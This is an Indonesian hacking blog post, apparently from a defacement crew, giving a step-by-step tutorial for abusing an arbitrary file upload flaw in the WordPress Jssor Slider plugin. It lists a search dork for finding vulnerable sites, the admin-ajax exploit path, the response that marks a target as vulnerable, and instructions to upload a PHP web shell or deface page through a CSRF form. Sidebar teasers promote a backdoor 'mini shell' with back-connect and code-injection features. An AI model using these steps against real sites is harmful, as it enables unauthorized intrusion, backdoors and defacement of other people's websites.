Langsung ke konten utama

Jssor Arbitary File Upload<WordPress>


Image result for exi2t cyber team

Hallo Semua sore sore gini enak nya bikin anak eh tutor ea.

1.Dork: Inurl:/wp-content/jssor-slider/ site:
2.Exploit:/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
Pertama kalian Dorking Dulu> Pilih salah satu website dan masuka exploit.





Jika vuln terdapat tulisan= {"jsonrpc" : "2.0", "result" : null, "id" : "id"} | Lihat gambar.

Okay masukan website nya kedalam CSRF Ganti Site.com menjadi website yang vuln, Jika sudah simpan sript dengan format .HTML

Jika sudah, buka CSRF tersebut.

Klik upload.







Upload Shell kalian ber extensi .php atau upload script deface kalian.

Jika Sudah Ter upload, buka SHELL atau SCRIPT deface.

Akses 

 /wp-content/jssor-slider/jssor-uploads/nama script.html

 /wp-content/jssor-slider/jssor-uploads/nama shell.php.



Sekian Tutorial Deface Jssor Arbitary Dari Saya jan9kr1k.

Support & Like Fp Kami 


Label:

Komentar

Posting Komentar

Postingan populer dari blog ini

5 Cara untuk memulai bisnis Online/Internet

Nooooyoooo, Kali ini saya akan membagikan cara/tips memulai bisnis di internet, dengan simple saya menyajikan 5 tahap agar bisnis di internet bisa tercapai, jangan ragu untuk memulai , lihat,lakukan,kerjakan. okay SWIPE DOWN!!!  1. Membangun Blog/ Website Menurut saya, ini adalah langkah awal paling mudah yang bisa dilakukan oleh seorang pemula untuk membangun sebuah bisnis online. Belajar membangun sebuah blog/ website dengan topik tertentu dan memberikan manfaat bagi audiens adalah sesuatu yang tidak terlalu sulit. Kita bisa membuat blog yang berhubungan dengan minat/hobby dan keahlian, tentu ada banyak orang yang punya minat atau hobby yang sama dengan Anda. Mereka inilah yang nantinya menjadi audiens Anda. Setelah blog/ website Anda memliki banyak pengunjung, Anda bisa memonetize blog tersebut dengan banyak cara. Beberapa cara memonetize blog Anda adalah dengan memasang iklan, misalnya menjadi publisher dan memasang iklan PPC Google Adsense, iklan produk sendiri, iklan a...
Posting Komentar
Baca selengkapnya

Cara install REcondog Di termux

Halo kali ini jangkrik akan ngasih tutorial bagaimana cara install recondog di termux :) Next jangkrik akan upload apa itu termux! :l Komen ya! ReconDog adalah salah satu tools basic dari infomation gathering tools ini sendiri di bangun dengan bahasa pemegroman python, ReconDog dapat di install di berbagai Os (Linux, Windows, Mac Os, Android) Untuk para phreaker mungkin tools ini akan sangat membantu dalam menganalisa suatu bug atau bahkan mencari bug itu sendiri Fitur ReconDog: 1. Whois Lookup 2. DNS Lookup + Cloudflare Detector 3. Zone Transfer 4. Port Scan 5. HTTP Header Grabber 6. Honeypot Detector 7. Robots.txt Scanner 8. Link Grabber 9. IP Location Finder 10. Traceroute Dan berikut penampakan ReconDog di Termux Cara Install Dan Menjalankan ReconDog Pertama tama install beberapa package berikut ini  apt install python2 apt install git Kemudian lakukan kloning script dari github git clone https://github.com/UltimateHackers/ReconDog Pi...
1 komentar
Baca selengkapnya

Br3ak4r Mini Shell V.01

 Br3ak4r Mini Shell by JAN9KR1K Hallo semua balik lagi bersama gua, kali ini gua luncurin shell baru, yaitu Br3ak4r Mini Shell, shell backdoor mini, pas banget buat nge-upload di server rendah(low), shell ini di lengkapi dengan beberap fungsi. Uploader- PhpInfo- Code Injector- Domains list- Back Connecter- Kill Shell- Ya fitur lain masih dalam pengembangan, tunggu aja V.02, gw usahain shell masih size kecil, biar cepet pas nge-upload. Untuk lihat script klik link di bawah KLIK ME SENPAII :*  Selamat Tahun Baru 2019 cokk. Support Ter00s
Posting Komentar
Baca selengkapnya